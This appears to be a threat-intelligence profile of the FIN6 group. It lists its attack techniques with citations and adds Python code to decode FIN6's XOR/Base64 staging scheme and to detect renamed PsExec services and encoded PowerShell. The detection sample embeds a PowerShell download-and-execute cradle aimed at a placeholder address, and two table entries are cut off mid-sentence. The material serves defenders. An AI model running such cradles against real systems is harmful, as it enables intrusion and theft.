FIN6
Associated Group Descriptions

| Name | Description |
|---|---|
| Skeleton Spider | (Citation: Crowdstrike Global Threat Report Feb 2018) |
| TAAL | (Citation: Microsoft Threat Actor Naming July 2023) |
| Camouflage Tempest | (Citation: Microsoft Threat Actor Naming July 2023) |
| Magecart Group 6 | (Citation: Security Intelligence ITG08 April 2020) |
| ITG08 | (Citation: Security Intelligence More Eggs Aug 2019) |
Techniques Used

| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1087.002 | Account Discovery: Domain Account | FIN6 has used Metasploit's PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016) |
| Enterprise | T1560.003 | Archive Collected Data: Archive via Custom Method | FIN6 has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.(Citation: FireEye FIN6 April 2016)(Citation: Trend Micro FIN6 October 2019) |
| Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.(Citation: FireEye FIN6 April 2016) |
| Enterprise | T1110.002 | Brute Force: Password Cracking | FIN6 has extracted password hashes from ntds.dit to crack offline.(Citation: FireEye FIN6 April 2016) |
| Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | FIN6 has used PowerShell to gain access to merchants' networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)(Citation: Visa FIN6 Feb 2019) |
| Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | FIN6 has used |
| Enterprise | T1059.007 | Command and Scripting Interpreter: JavaScript | FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.(Citation: Trend Micro FIN6 October 2019) |
| Enterprise | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | FIN6 has used the Stealer One credential stealer to target web browsers.(Citation: Visa FIN6 Feb 2019) |
| Enterprise | T1074.002 | Data Staged: Remote Data Staging | FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.(Citation: FireEye FIN6 April 2016) |
| Enterprise | T1573.002 | Encrypted Channel: Asymmetric Cryptography | FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.(Citation: FireEye FIN6 April 2016) |
| Enterprise | T1048.003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol | FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.(Citation: Trend Micro FIN6 October 2019) |
| Enterprise | T1562.001 | Impair Defenses: Disable or Modify Tools | FIN6 has deployed a utility script named |
| Enterprise | T1070.004 | Indicator Removal: File Deletion | FIN6 has removed files from victim machines.(Citation: FireEye FIN6 April 2016) |
| Enterprise | T1036.004 | Masquerading: Masquerade Task or Service | FIN6 has renamed the "psexec" service name to "mstdc" to masquerade as a legitimate Windows service.(Citation: FireEye FIN6 Apr 2019) |
| Enterprise | T1003.001 | OS Credential Dumping: LSASS Memory | FIN6 has used Windows Credential Editor for credential dumping.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019) |
| Enterprise | T1003.003 | OS Credential Dumping: NTDS | FIN6 has used Metasploit's PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019) |
| Enterprise | T1027.010 | Obfuscated Files or Information: Command Obfuscation | FIN6 has used encoded PowerShell commands.(Citation: Visa FIN6 Feb 2019) |
| Enterprise | T1588.002 | Obtain Capabilities: Tool | FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.(Citation: Security Intelligence More Eggs Aug 2019)(Citation: FireEye FIN6 Apr 2019) |
| Enterprise | T1069.002 | Permission Groups Discovery: Domain Groups | FIN6 has used tools like AdFind to query users, groups, organizational units, and trusts.(Citation: FireEye FIN6 Apr 2019) |
| Enterprise | T1566.001 | Phishing: Spearphishing Attachment | FIN6 has targeted victims with e-mails containing malicious attachments.(Citation: Visa FIN6 Feb 2019) |
| Enterprise | T1566.003 | Phishing: Spearphishing via Service | FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.(Citation: Security Intelligence More Eggs Aug 2019) |
| Enterprise | T1021.001 | Remote Services: Remote Desktop Protocol | FIN6 used RDP to move laterally in victim networks.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019) |
| Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | FIN6 has used scheduled tasks to establish persistence for various malware it uses, including the downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.(Citation: FireEye FIN6 April 2016) |
| Enterprise | T1553.002 | Subvert Trust Controls: Code Signing | FIN6 has used Comodo code-signing certificates.(Citation: Security Intelligence More Eggs Aug 2019) |
| Enterprise | T1569.002 | System Services: Service Execution | FIN6 has created Windows services to execute encoded PowerShell commands.(Citation: FireEye FIN6 Apr 2019) |
| Enterprise | T1204.002 | User Execution: Malicious File | FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.(Citation: Visa FIN6 Feb 2019) |
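The custom archive encoding in the T1560.003 row (a substitution cipher, a single-byte XOR with key 0xAA, and Base64 over a permuted alphabet) is concrete enough to decode mechanically once the tables are pulled from a sample. The Python below is an added example written for this page, not code from FIN6 or from the FireEye or Trend Micro reports: the substitution table, the permuted alphabet and the order of the stages are assumptions chosen for illustration (for a real sample they are lifted from the binary), only the 0xAA key comes from the page, and the sample record is constructed. It also shows known-plaintext recovery of a single-byte XOR key, which generalises beyond 0xAA.

```python
"""
Added example: decode data staged with the custom scheme described for
FIN6 (byte substitution, single-byte XOR with key 0xAA, Base64 over a
permuted alphabet). Tables, alphabet and stage order are assumptions.
"""
import base64
import string
from typing import Optional

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
XOR_KEY = 0xAA  # the single-byte key reported for FIN6

# Assumed permuted alphabet: the standard alphabet reversed. Any 64-symbol
# permutation works; for a real sample the alphabet is lifted from the binary.
PERMUTED_ALPHABET = STD_ALPHABET[::-1]

# Assumed substitution table: affine map b -> 7*b + 3 (mod 256). 7 is odd,
# so the map is a bijection on bytes and can be inverted by lookup.
SUBST_TABLE = bytes((7 * b + 3) % 256 for b in range(256))
INV_SUBST_TABLE = bytes(SUBST_TABLE.index(b) for b in range(256))


def xor_single_byte(data: bytes, key: int) -> bytes:
    """Single-byte XOR; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def b64_permuted_encode(raw: bytes, alphabet: str = PERMUTED_ALPHABET) -> str:
    """Standard Base64, then remap every symbol into the custom alphabet."""
    return base64.b64encode(raw).decode("ascii").translate(
        str.maketrans(STD_ALPHABET, alphabet))


def b64_permuted_decode(text: str, alphabet: str = PERMUTED_ALPHABET) -> bytes:
    """Map the custom alphabet back to standard symbols, then decode."""
    return base64.b64decode(text.translate(str.maketrans(alphabet, STD_ALPHABET)))


def encode_staged(raw: bytes) -> str:
    """Model of the encoder: substitute -> XOR 0xAA -> permuted Base64.
    The stage order is an assumption; a real sample may differ."""
    return b64_permuted_encode(xor_single_byte(raw.translate(SUBST_TABLE), XOR_KEY))


def decode_staged(text: str) -> bytes:
    """Invert encode_staged stage by stage, in reverse order."""
    return xor_single_byte(b64_permuted_decode(text), XOR_KEY).translate(INV_SUBST_TABLE)


def recover_xor_key(blob: bytes, crib: bytes) -> Optional[int]:
    """Brute-force a single-byte XOR key from a known-plaintext prefix.
    XOR with a byte is a bijection, so at most one key fits a non-empty crib."""
    for key in range(256):
        if xor_single_byte(blob[: len(crib)], key) == crib:
            return key
    return None


# Constructed sample record (not real card data), of the kind a POS
# memory scraper stages before exfiltration.
SAMPLE = b"CARD=0000000000000000;EXP=0000;NAME=TEST/USER\r\n"

if __name__ == "__main__":
    wire = encode_staged(SAMPLE)
    print("encoded :", wire)
    print("decoded :", decode_staged(wire))
    key = recover_xor_key(xor_single_byte(SAMPLE, XOR_KEY), b"CARD=")
    print("key     : 0x%02X" % key)
```

In practice the crib for `recover_xor_key` is whatever structure the staged data is known to carry (a record delimiter, a field label, a track sentinel); because single-byte XOR is a per-byte bijection, a few bytes of known plaintext pin the key uniquely, which is why this layer adds no real protection and is best treated as an obfuscation signature rather than encryption.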
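Three rows of the table describe things that surface in Windows service-install telemetry: PsExec's service renamed to "mstdc" (T1036.004), encoded PowerShell commands (T1027.010) and services created to run them (T1569.002). The Python below is an added example for this page, not detection content from the cited reports: it runs heuristics over constructed records shaped like System log Event ID 7045 (service installed) and Sysmon Event ID 17 (named pipe created). Assumptions: that a PsExec service renamed with `-r` appears as a service whose binary, named after the service, sits directly in %SystemRoot% and whose I/O pipes end in `-stdin`/`-stdout`/`-stderr`; the record field names, the 192.0.2.10 address (an RFC 5737 documentation address) and the sample payload are constructed.

```python
"""
Added example: detection heuristics over constructed Windows telemetry for
a renamed PsExec service and services that launch encoded PowerShell.
Record shapes, the heuristics and the sample payload are assumptions.
"""
import base64
import binascii
import re
from typing import List, Optional

# A service whose binary is <ServiceName>.exe dropped straight into
# %SystemRoot% is the shape PsExec leaves (PSEXESVC by default; the name
# changes with -r). Assumption: ImagePath is recorded in one of these forms.
SYSTEMROOT_BINARY = re.compile(
    r"^(?:%SystemRoot%|C:\\Windows)\\([^\\\s]+)\.exe\s*$", re.I)

# powershell ... -e/-ec/-en/-enc/-EncodedCommand <base64>. PowerShell accepts
# any unambiguous prefix of the switch, which is why the alternation is wide.
ENCODED_PS = re.compile(
    r"\bpowershell(?:\.exe)?\b.*?\s-(?:e|ec|en|enc|encodedcommand)\s+"
    r"([A-Za-z0-9+/=]{16,})", re.I | re.S)

# PsExec's I/O pipes are named <service>-<host>-<pid>-stdin/-stdout/-stderr.
PSEXEC_PIPE = re.compile(r"-(?:stdin|stdout|stderr)$", re.I)


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries Base64 of UTF-16LE text; None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_service_install(event: dict) -> List[str]:
    """Heuristics for one System log Event ID 7045 (service installed)."""
    findings: List[str] = []
    name, image = event.get("ServiceName", ""), event.get("ImagePath", "")
    m = SYSTEMROOT_BINARY.match(image)
    if m and m.group(1).lower() == name.lower():
        if name.upper() == "PSEXESVC":
            findings.append(f"PsExec service installed under its default name ({name})")
        else:
            findings.append(
                f"service '{name}' runs {image}: binary named after the service "
                f"directly in %SystemRoot%, consistent with renamed PsExec (-r)")
    em = ENCODED_PS.search(image)
    if em:
        decoded = decode_encoded_command(em.group(1))
        findings.append(f"service '{name}' launches encoded PowerShell: "
                        + (decoded.strip() if decoded else "<payload did not decode>"))
    return findings


def analyze_pipe_created(event: dict) -> List[str]:
    """Heuristic for one Sysmon Event ID 17 (named pipe created)."""
    pipe = event.get("PipeName", "")
    if PSEXEC_PIPE.search(pipe):
        stem = pipe.lstrip("\\").split("-")[0]
        return [f"PsExec-style I/O pipe {pipe} (service stem '{stem}')"]
    return []


def run_detections(events: List[dict]) -> List[str]:
    """Dispatch on EventID; other event types are ignored."""
    out: List[str] = []
    for ev in events:
        if ev.get("EventID") == 7045:
            out += analyze_service_install(ev)
        elif ev.get("EventID") == 17:
            out += analyze_pipe_created(ev)
    return out


# Constructed sample events. 192.0.2.10 is an RFC 5737 documentation address.
PLAINTEXT_PS = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s')"
ENCODED_PAYLOAD = base64.b64encode(PLAINTEXT_PS.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "mstdc", "ImagePath": r"%SystemRoot%\mstdc.exe"},
    {"EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 7045, "ServiceName": "UpdateSvc",
     "ImagePath": f"%COMSPEC% /c powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"},
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 17, "PipeName": r"\mstdc-WS01-4321-stdin", "Image": r"C:\Windows\mstdc.exe"},
]

if __name__ == "__main__":
    for finding in run_detections(SAMPLE_EVENTS):
        print("ALERT:", finding)
```

The point of decoding the payload inside the detection is that a renamed service and an opaque `-enc` blob each look benign on their own; surfacing the UTF-16LE command text next to the service name is what lets an analyst triage the 7045 without reproducing the decode by hand. Pipe-name matching catches the rename even where the service install itself was not logged, since PsExec's stdin/stdout/stderr pipes keep their suffixes whatever `-r` sets the service name to.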
References
- McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.
- Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.
- FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.
- Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020.
- Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved September 19, 2024.
- Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020.
- Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020.
- Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020.
- CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.
- Villadsen, O. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
- Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.
- Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
- Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.